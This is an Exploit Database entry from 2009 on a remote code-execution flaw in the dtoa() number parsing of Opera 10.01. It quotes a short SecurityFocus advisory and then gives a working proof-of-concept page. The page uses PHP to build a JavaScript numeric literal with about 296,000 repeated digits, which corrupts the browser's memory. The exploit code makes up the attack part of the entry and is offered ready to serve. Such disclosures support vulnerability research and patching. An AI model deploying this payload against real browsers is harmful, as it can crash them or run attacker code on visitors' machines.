Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution

EDB-ID:

33363




Platform:

Multiple

Date:

2009-11-20


source: https://www.securityfocus.com/bid/37078/info

Opera Web Browser is prone to a remote code-execution vulnerability.

Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.

NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.

This issue affects Opera 10.01; other versions may also be affected. 


<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>